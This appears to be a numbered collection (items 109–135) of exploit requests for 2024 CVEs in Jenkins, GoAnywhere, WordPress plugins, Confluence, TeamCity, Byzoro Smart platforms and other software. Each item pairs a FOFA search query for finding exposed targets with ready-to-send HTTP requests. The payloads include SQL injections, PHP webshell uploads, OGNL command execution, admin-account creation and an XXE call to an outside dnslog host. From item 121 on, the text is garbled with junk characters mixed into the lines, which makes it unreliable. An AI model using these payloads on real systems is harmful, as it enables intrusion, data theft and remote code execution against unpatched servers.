Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA: header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA: body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA: "wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA: body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA: "/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA: body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "第一步获得的值",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA: body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 – 7.10.0
FOFA: body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Byzoro (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA: title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA: title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Byzoro Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA: title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Byzoro Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA: title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328* F: c$ ]4 F7 d5 z0 }) }2 C
+ U" p, I4 w, t- C# U

: b. i  }& o" Y5 m+ q$ k4 Zboot/web/upload/weblogo/1.php
" s1 n9 b/ O) T( P2 Q
2 [+ E- Q7 h" Q5 i122. 北京百绰智能s200管理平台/importexport.php sql注入
/ c1 k  m& _! b  {; I6 gCVE-2024-27718FOFA:title="Smart管理平台"3 d4 d; v9 e$ U6 v, v+ M
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()8 p% h4 o; G2 I6 ]4 n' T
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1* C4 y- l0 \  E8 h# `" |
Host: x.x.x.x+ ]7 r: d! Y1 k4 N' C4 h' s
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
" j( r- t( z1 ^& P. Y# e; I, yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.05 o6 H" q# ]( G+ q+ F; `3 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* s: z  y+ L, I! D* \4 i+ Z  z( J9 ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  e: Z0 R  F& NAccept-Encoding: gzip, deflate, br
5 `/ V8 B* w! m* {, {) w2 `' eUpgrade-Insecure-Requests: 17 s8 _3 b( y+ H
Sec-Fetch-Dest: document( {7 Q2 N; p* W" [
Sec-Fetch-Mode: navigate8 A  m5 P: b  o0 ^* Q7 g
Sec-Fetch-Site: none$ N% v- ^  `" p5 W( O2 ^! j
Sec-Fetch-User: ?1  m( h# V8 M. g
Te: trailers
8 O+ H# f. f$ n, Q2 f: MConnection: close) V" o2 e% A2 e7 V8 s
, f1 O) m# C5 G
. I0 R; \8 d* j8 U
123. Atlassian Confluence 模板注入代码执行
4 e/ M% c# w2 e  x2 i# v" D3 N& cFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"* @" B& _+ P9 T' r0 Y
POST /template/aui/text-inline.vm HTTP/1.1
* @! B# b9 }9 e8 EHost: localhost:8090
9 G: E$ Y: U! {( WAccept-Encoding: gzip, deflate, br7 C" {& L: P) G
Accept: */*
7 }/ G: f0 ]' P: ^7 e" x/ PAccept-Language: en-US;q=0.9,en;q=0.8
- V( \% s! E! X* v" ~( s2 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
; Z8 l# @9 F! G* hConnection: close
# V5 i, @: \8 k) l0 z2 m7 eContent-Type: application/x-www-form-urlencoded" v3 ^% p6 L- n0 ^# o
& ?2 o7 V( v6 q
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))0 t. W/ p$ w! f9 U7 \& z9 a. Y, u
7 f( n  n' s7 T4 \  G2 m- j% E! p
6 m; f3 H3 n  t, c
124. 湖南建研工程质量检测系统任意文件上传
: C/ t! U1 f  p+ ZFOFA:body="/Content/Theme/Standard/webSite/login.css"6 T7 D0 I, O; o5 V5 N% {
POST /Scripts/admintool?type=updatefile HTTP/1.14 l3 g5 ~: S4 g/ E
Host: 192.168.40.130:8282* C% i* p2 e1 B5 b& m1 X+ h
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
3 [- b* k( Z& T7 KContent-Length: 72; n+ R( {9 i  u3 B% @+ z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
# v0 @5 p! L, H3 y4 t. E$ h1 i  {Accept-Encoding: gzip, deflate, br
( n* q4 X- y$ P9 D! a: PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! N4 G. w* C+ {0 m4 n1 e' H% S
Connection: close
% z, a6 J" Y1 X2 BContent-Type: application/x-www-form-urlencoded
$ h8 t4 v5 N7 u, H" u3 S8 T- n7 i+ Q1 B# Q, N  v
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
6 Q# i% l0 Z  `( a% l0 O( q" L" m$ A$ C

" u6 K! U$ [$ p1 Q/ v7 R* Z2 xhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
: t9 F2 e' P' E/ J. |
. a# W9 e$ l! z3 Y5 U! e9 `125. ConnectWise ScreenConnect身份验证绕过
2 ^$ f9 T  k( k4 @" W( H  OCVE-2024-1709
3 Z, ~4 @. }' Y5 g% y1 tFOFA:icon_hash="-82958153"- E4 v6 h/ H/ x" |. B& e/ `
https://github.com/watchtowrlabs ... bypass-add-user-poc, Z. m4 J- s) F( S, `

/ w& ^1 n) ~: M* }+ ?- M0 J& L+ m. z4 i
使用方法
3 q3 W' P. R  ]8 K. n* |4 Gpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
( j9 h2 B1 S  W; O4 I3 \3 v& \+ R( |$ F# ^/ V+ I( U

3 [! t# a& ~8 a* T8 \创建好用户后直接登录后台,可以执行系统命令。- O3 g1 v8 G1 V, Q/ V
0 A- _+ R4 e) G! j; r
126. Aiohttp 路径遍历
0 G1 A9 M5 d+ P! J  b' z* sFOFA:title=="ComfyUI"
' [& C* N- `" w  A; ^/ fGET /static/../../../../../etc/passwd HTTP/1.1
- K- \. W5 F# u$ k$ LHost: x.x.x.x9 i+ U3 l" Q$ n9 U2 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
9 @$ ^9 N9 ?: U# CConnection: close" }4 o2 R  W2 {. T0 f
Accept: */** Z% H. d6 C/ F: {  A
Accept-Language: en
# O- P4 O+ z: J6 `! u( |Accept-Encoding: gzip5 q: @- M! f" F$ A5 e

  r: b: `/ F$ n2 x" q: M3 o7 v# d
127. 广联达Linkworks DataExchange.ashx XXE" ^. {! S4 x: N& ~" x/ Y* T8 X; d
FOFA:body="Services/Identification/login.ashx" + X3 I! t7 ~- z  X
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1( c  Q: F8 |! \
Host: 192.168.40.130:8888: X' Z6 u4 C5 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
. ^  r. p8 ?. W. @Content-Length: 415
# ~5 Y3 {: ~/ G% B# r# qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# p/ J/ T5 }* `$ J7 j- v
Accept-Encoding: gzip, deflate
, V- @& @8 P$ W: V: p6 k7 CAccept-Language: zh-CN,zh;q=0.9! [; M: Q4 f9 [# f3 E
Connection: close
; Q, ~) K+ [7 e0 e7 EContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
- {8 ]$ j& [. i/ f/ \Purpose: prefetch$ t. g0 N+ M* z$ w: x
Sec-Purpose: prefetch;prerender
4 T- a5 m; t# n. \/ L4 t
2 v0 r# c$ ]/ }8 y! w------WebKitFormBoundaryJGgV5l5ta05yAIe08 a1 N6 M( {3 p1 z0 |
Content-Disposition: form-data;name="SystemName"
9 P5 e. j9 U! v7 D* J0 l
/ j/ B/ p5 B' n5 ~# u/ J+ ZBIM
6 ^& f4 \5 t% @5 Q* m' @------WebKitFormBoundaryJGgV5l5ta05yAIe0
, c( _7 r& Y  ?8 [8 m7 u* k1 cContent-Disposition: form-data;name="Params"
4 I  j  Q" B4 r5 q, hContent-Type: text/plain
/ o9 p; q+ V2 e9 ]0 q' i: Q2 W+ R  \& w6 l+ p) R( f: N" [
<?xml version="1.0" encoding="UTF-8"?>
% \+ `' F0 O! [  o<!DOCTYPE test [
& w5 t7 W: s, d4 v<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
- G+ ?2 {+ a, s/ ^]
6 \# K0 d7 n" n  X+ b>
3 H+ E  ~8 G: e+ S<test>&t;</test>
3 U% k* K6 q+ Z7 x: a; p& u------WebKitFormBoundaryJGgV5l5ta05yAIe0--
7 H. o7 w: \3 v- D) Z8 P
* D- t* ?- o1 `% K& N- ~% K1 V# ^! N& F2 A8 a: P' L" a" N
( \# h) D3 A3 F' f# g0 R4 P6 M
128. Adobe ColdFusion 反序列化+ s9 Y2 S/ M) I$ J% r* H: q
CVE-2023-38203
% Q# K! L4 t8 H0 z8 jAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
( d8 b9 h. Z: \6 n! h9 N% y  \FOFA:app="Adobe-ColdFusion"
3 W3 m5 {8 W% l2 SPAYLOAD7 V/ U$ v& k7 f; z% J
  X5 X: O( T. g' _" N
129. Adobe ColdFusion 任意文件读取
! H5 o& s" _' o% i; s: v8 MCVE-2024-20767
' K  y: Q7 t, f, [0 k% BFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"3 J; l8 U; \5 ]; J# Z9 M
第一步,获取uuid" N' s2 ?1 h$ O) c. J' u, W
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
# p/ d& G2 W- T. s: }Host: x.x.x.x8 V4 D& c: B) j8 r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 n2 b! [8 H. bAccept: */** R7 K& Q$ A' P& ?
Accept-Encoding: gzip, deflate
+ f: K6 U/ l/ ~- l$ C" c: l1 f! kConnection: close
2 S' ]& D% S+ g) @9 i
& l8 J6 p2 o' Q  H0 o# `: n' |4 V+ `5 o" ?# x9 v: D
第二步,读取/etc/passwd文件9 P9 {% n% n( C4 @$ C3 g' I" M
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1! E" ~$ i4 o) o1 \, |& Q* C
Host: x.x.x.x# ~5 m" z1 i7 w# q; ]- c' Q; n& K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* G6 X5 L1 p6 tAccept: */*
  Y" o$ t' L& p# d8 J; m( EAccept-Encoding: gzip, deflate# H5 G( ~$ z$ Q2 c' j6 \
Connection: close4 v- q7 s6 `5 D+ x2 |* t; ^  _" i* y: D
uuid: 85f60018-a654-4410-a783-f81cbd5000b94 }# H: l9 R3 f. ^) g' A

% T4 u. {4 I+ ~& n  B
5 X( y7 u1 j( N0 f130. Laykefu客服系统任意文件上传, N% s, x* d/ h2 J7 g6 A
FOFA:icon_hash="-334624619"
8 W! n# V+ ~9 B) M$ _" o# `% BPOST /admin/users/upavatar.html HTTP/1.1
" m3 U" v& l0 `: Z$ ?* j1 fHost: 127.0.0.1
9 P7 E# E1 X0 E' Q7 ZAccept: application/json, text/javascript, */*; q=0.01% v6 v1 w8 E7 s& Z" {/ g: J
X-Requested-With: XMLHttpRequest
$ K2 \! o  g* k# ?- q" |User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.261 c5 n' R0 f& |$ Q& B% B8 \  |
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
" g+ t8 z/ g" zAccept-Encoding: gzip, deflate
) }# z' r/ J4 t" hAccept-Language: zh-CN,zh;q=0.9  Q0 Q, B  F( F! @* V0 q
Cookie: user_name=1; user_id=35 s4 |3 p! z4 O+ C) w
Connection: close
8 S( y/ I5 m2 A; O4 O, R+ ~3 H7 m) w( M7 U/ L, k. D" a) O
------WebKitFormBoundary3OCVBiwBVsNuB2kR3 D: [  g  \1 V
Content-Disposition: form-data; name="file"; filename="1.php", T# o+ E; ~5 L+ p% N
Content-Type: image/png; S( q" _, D0 R2 s& o9 @5 @5 J
; O3 m1 O; O* G7 _" G
<?php phpinfo();@eval($_POST['sec']);?>; a, Y3 }1 S8 b) u" e
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
8 r$ Z2 e/ m+ s+ D, x( }1 W' S* J! J  M2 r8 t" C! X

; x; @3 _- p9 \) h5 `, k9 X0 b& o131. Mini-Tmall <=20231017 SQL注入
5 [9 x/ `" ?" gFOFA:icon_hash="-2087517259"
0 \$ n2 x- F% t5 _9 U$ S后台地址:http://localhost:8080/tmall/admin
- f- O9 ?: k- f& R, Phttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
6 v7 d) s/ c; T7 O) g# B, i) b8 b. w
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过$ Q4 s5 z( _6 l5 \3 b
CVE-2024-27198
# L: k5 b4 `. u) }FOFA:body="Log in to TeamCity"1 R; V- j0 e% E! [+ }6 q! O1 y
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.16 s& v. ~6 h7 {+ W) N6 [1 R
Host: 192.168.40.130:8111
* l6 b9 D8 l! r3 v. r6 S0 N1 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, l0 @- h0 }; U4 E: [, H* p
Accept: */*4 E+ V1 |2 p, F/ E: A
Content-Type: application/json
: H- e1 {( A) y0 x' X5 h$ WAccept-Encoding: gzip, deflate
5 c3 J$ T! ~% M* d% c# H/ c. h9 R6 Q2 j# Q7 v
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}9 h( B' b+ E! |" L5 v2 o, _

; \% s1 ^( y  r. U& l! l6 {7 u- T7 n7 l
CVE-2024-27199( Z& |! w: ]3 Q6 f
/res/../admin/diagnostic.jsp- m8 M6 u4 f1 e
/.well-known/acme-challenge/../../admin/diagnostic.jsp( H) E6 f7 d- ^; Q! u
/update/../admin/diagnostic.jsp% {; q* U  g; I1 r4 t. ]

* J# K) ^4 e1 G, l1 Z
  i8 e- c4 d# F  t) ECVE-2024-27198-RCE.py
' l0 `; x6 w$ k7 J! y
5 x. D: K. d2 v5 P) d- @" ~5 @133. H5 云商城 file.php 文件上传) F, a7 o* S) a$ u1 ~! c
FOFA:body="/public/qbsp.php". t$ [3 i" a  i, ], q- f" i/ X
POST /admin/commodtiy/file.php?upload=1 HTTP/1.12 b2 ?5 U* g* u0 c. P, _  Y
Host: your-ip
4 W9 s9 O1 F5 \& EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.368 _7 n2 p+ @) D6 D- |) ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
& h8 P) g/ j( Q: T2 f
, Y) t  a  \+ x% F6 L, G  |------WebKitFormBoundaryFQqYtrIWb8iBxUCx* c$ y; e% u5 R; v( R; f
Content-Disposition: form-data; name="file"; filename="rce.php"% Z1 v- |" D$ ^' v  J: f
Content-Type: application/octet-stream7 r. Y+ I: s( c1 X

0 \3 O/ O/ R. ~# v1 F, E- i<?php system("cat /etc/passwd");unlink(__FILE__);?>7 n6 U" Q; U7 N: s% e
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
  R  v6 o: [: Z9 a% I
8 x5 o0 s3 _9 T7 r: c7 a3 R+ D8 k+ b. A8 T) H/ F, T2 R$ E

: w9 k* I8 m- O/ t1 w, ?5 Y$ s* m134. 网康NS-ASG应用安全网关index.php sql注入) Z7 b! Q# K8 Y# H
CVE-2024-2330
9 X# A: N) O, x" D/ ]  v( K, iNetentsec NS-ASG Application Security Gateway 6.3版本
8 w6 W# Y+ h: j7 D) HFOFA:app="网康科技-NS-ASG安全网关"7 Y/ }* E( p  t8 A5 q
POST /protocol/index.php HTTP/1.1
7 C* ]/ B3 A: f% ?/ t* I1 DHost: x.x.x.x
: j: z  f" P7 k/ ?6 n. K- XCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
/ R5 r' u/ m- w' U- T. u3 z. G5 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0+ Q: [- A: n+ B8 p& \; G  {* k) L
Accept: */*9 F8 G5 z: t5 `" Q8 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 Y$ [1 `! `) m; K9 m) u
Accept-Encoding: gzip, deflate
, C) E1 @0 O- ?/ r) B& C: ?  iSec-Fetch-Dest: empty) r  ]1 v7 H6 h7 p6 A, o
Sec-Fetch-Mode: cors* @9 A7 m- r$ N6 Y
Sec-Fetch-Site: same-origin% \+ R( v0 q% G
Te: trailers
1 g' H, l& `# h, R! {" RConnection: close
7 V2 e- z0 L4 D; C0 S5 h) c2 nContent-Type: application/x-www-form-urlencoded
# i& c# q. U% |' O5 k2 I4 kContent-Length: 263: C# o( @: c; e! L' @
. b0 |" G& h, r$ I6 e5 {( u1 C1 Z
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
3 u$ ^3 w- T5 U2 D
" v0 F7 E0 f, V3 y% n
) V0 v0 L' R1 S0 e2 D9 b1 ]135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入) m; C; @- d3 Z
CVE-2024-2022
& U4 I& x( j1 G# }$ a' aNetentsec NS-ASG Application Security Gateway 6.3版本9 e1 }' C9 I9 }$ K- H
FOFA:app="网康科技-NS-ASG安全网关"! J% n  R3 c  M& I: A
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
3 n; N; ]1 g1 }! ~( w- S1 PHost: x.x.x.x
* j! N( p7 J! B3 G0 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
